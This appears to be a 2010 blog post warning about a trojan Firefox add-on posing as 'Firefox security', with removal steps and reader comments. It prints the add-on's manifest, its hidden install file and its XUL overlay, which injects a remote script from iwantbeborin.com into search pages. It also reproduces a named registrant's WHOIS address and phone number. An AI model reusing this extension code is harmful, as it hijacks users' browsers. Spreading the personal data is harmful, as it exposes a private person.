Home > Uncategorized > Watch out for “Firefox security” at your Mozilla Firefox add-ons

Watch out for “Firefox security” at your Mozilla Firefox add-ons

image

If you go to Tools / Add-ons menu (might be calling them "Plugins" or "Extensions", don’t remember the exact English text there) at Mozilla FireFox, do you see one called "Firefox security" there with subtitle "Internal security options editor."? If so, then uninstall it immediately, it’s Trojan JS/Dursg.C or a variant.

See more info at the JS/Dursg.C trojan description page for other items (e.g. startup processes) the trojan installs that need to be removed. You can also use Microsoft’s free OneCare Live Scanner and select full scan to remove this threat (runs using Internet Explorer only and if the trojan has infected your system you may need to set security zones in IE to low temporarily to bypass the trojan’s trickery and make it to access the virus scanner if it says that IE didn’t allow the ActiveX control to initialize in an unsafe manner).

BTW, also remove the folder %ProgramFiles%\Mozilla Firefox\extensions\{9CE11043-9A15-4207-A565-0C94C42D590D}

In there you’ll see:

(1) at main folder a chrome.manifest:

content    ttimer    chrome/content/
overlay    chrome://browser/content/browser.xul    chrome://ttimer/content/timer.xul
locale ttimer ja chrome/locale/ja/

interesting that it speaks about locale ja there (Japan)

(2) an install.rdf file that claims "Mozila Ltd." (note the single "l" there) as the creator of the add-on and describes it as "Internal security options editor." (the dot at the end of the description string could make one suspicious I guess from the beginning):

<?xml version="1.0"?>
<RDF xmlns="
http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:name>Firefox security</em:name>
    <em:id>{9CE11043-9A15-4207-A565-0C94C42D590D}</em:id>
    <em:version>2.0</em:version>
    <em:creator>Mozila Ltd.</em:creator>
    <em:description>Internal security options editor.</em:description>
    <em:type>2</em:type>
    <em:hidden>true</em:hidden>
    <em:targetApplication>
      <Description>
        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
        <em:minVersion>2.*</em:minVersion>
        <em:maxVersion>5.*</em:maxVersion>
      </Description>
    </em:targetApplication>
  </Description>
</RDF>

(3) at content\chrome subfolder a timer.xul file that injects a remote malicious script from a remote site every time you do a web search using search engines Google / Yahoo / Bing / Ask.com / AOL.

<?xml version="1.0" encoding="UTF-8"?>

<overlay id="xulcache-overlay" xmlns="
http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">

<script type="application/x-javascript" >

function Insert() {
 
var headID = content.document.getElementsByTagName("head")[0];
var newScript = content.document.createElement("script");
newScript.type = "text/javascript";
newScript.src = "
http://iwantbeborin.com/request.php?aid=blackout";
headID.appendChild(newScript);
}

function URL() {
var url=content.document.location.href;
if(url.indexOf("googlesearchserver") == -1 ) {
  if(url.indexOf("search") != -1 ) {
   if(url.indexOf("google.com") != -1) { Insert(); }
   if(url.indexOf("yahoo.com") != -1)  { Insert(); }
   if(url.indexOf("bing.com") != -1) {Insert();}
   if(url.indexOf("ask.com") != -1) { Insert(); }
   if(url.indexOf("aol.com/aol/search?s_it") != -1) {Insert();}
  }
}
}

window.addEventListener("load", init, false);

function init() {
var appcontent = document.getElementById("appcontent");
if(appcontent) {
  appcontent.addEventListener("DOMContentLoaded", onPageLoad, true);
}
}

function onPageLoad(aEvent) {
URL();
}

</script>
</overlay>

Note the really crap programming style at URL() function, the guy hasn’t heard of the logical-OR boolean operation?

Web browsers should be more stringent against known malicious extensions like that and proactively monitor for them being installed (even if the user tries to) and block them if they’re found to be installed (using some periodic or startup check). Moreover I don’t think extensions should be allowed to be installed outside of the browser’s extension management GUI, so that other applications and exploits can’t infect the browser with such malicious extensions without the user noticing. In fact I went on and suggested this to the Firefox team on Twitter (@firefox).

In a system I cleaned recently, it was loading the remote stuff from ""iwantbeborin.com" and showing "AdultFriendFinder" ads (it’s obvious they got something in return to advertise that crap – such rogue businesses like AdultFriendFinder should be shut down (or at least blocked till they behave) by authorities since they’re showing XXX content to minors etc., are following illegal trade practices that hurt competition and intrude in third party systems threatening user’s privacy and costing them precious work time and money to repair their systems).

Domain Tools (http://whois.domaintools.com/iwantbeborin.com) have more info on this $$$hole:

Domain name: iwantbeborin.com
Status: Active
Protection Status: public
( make contact info private at http://www.now.cn/domain/domainPrivate.php )
Registrant:
Name: Alexey Prokopenko
Address: Lenina 4, kv 1
City: Ubileine
Province/state: LUGANSKA OBL
Country: UA
Postal Code: 519000
Administrative Contact:
Name: Alexey Prokopenko
Organization: Alexey Prokopenko
Address: Lenina 4, kv 1
City: Ubileine
Province/state: LUGANSKA OBL
Country: UA
Postal Code: 519000
Phone: +380.979668534
Fax: +380.979668535
Email:
Technical Contact:
Name: Alexey Prokopenko
Organization: Alexey Prokopenko
Address: Lenina 4, kv 1
City: Ubileine
Province/state: LUGANSKA OBL
Country: UA
Postal Code: 519000
Nameserver Information:
    ns1.everydns.net
    ns2.everydns.net
    ns3.everydns.net
    ns4.everydns.net
Create: 2010-03-16 06:06:02
Update: 2010-03-16
Expired: 2011-03-16
QueryTimes: 65

 

Their Reverse Whois info there says:

"Alexey Prokopenko" owns about 30 other domains

Email Search: is associated with about 76 domains

Registrar History: 1 registrar

NS History: 1 change on 2 unique name servers over 0 year.

IP History: 4 changes on 4 unique name servers over 0 years.

Whois History: 6 records have been archived since 2010-03-17 .

Reverse IP: 6 other sites hosted on this server.

If anyone has paid access to DomainTools I’d like to know which other 30 malicious domains this guy has and what are the other 6 sites hosted on the same malicious server.

Advertisements
Categories: Uncategorized Tags:
  1. 2010/11/02 at 14:37

    I know this is very old post but I just got this trojan installed on my browser “Firefox”. The search queries were behaving weirdly, when I try to open any site after searching on Google it did not open it and weird errors appear like “Method Not Allowed”.

    I just paid attention to the site that was loading when I search anything and it was iwantbeborin.com and when I searched about it I found this post 🙂

    Thank you very much for your post, I have removed that addon but I don’t find this folder

    \Mozilla Firefox\extensions\{9CE11043-9A15-4207-A565-0C94C42D590D}

    I checked search results again and so far everything is working fine so I guess removing this folder is not important anymore.

  2. 2011/03/01 at 20:00

    glad it helped

  3. Yahoo
    2011/04/27 at 05:15

    Love internet explorer more than firefox

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: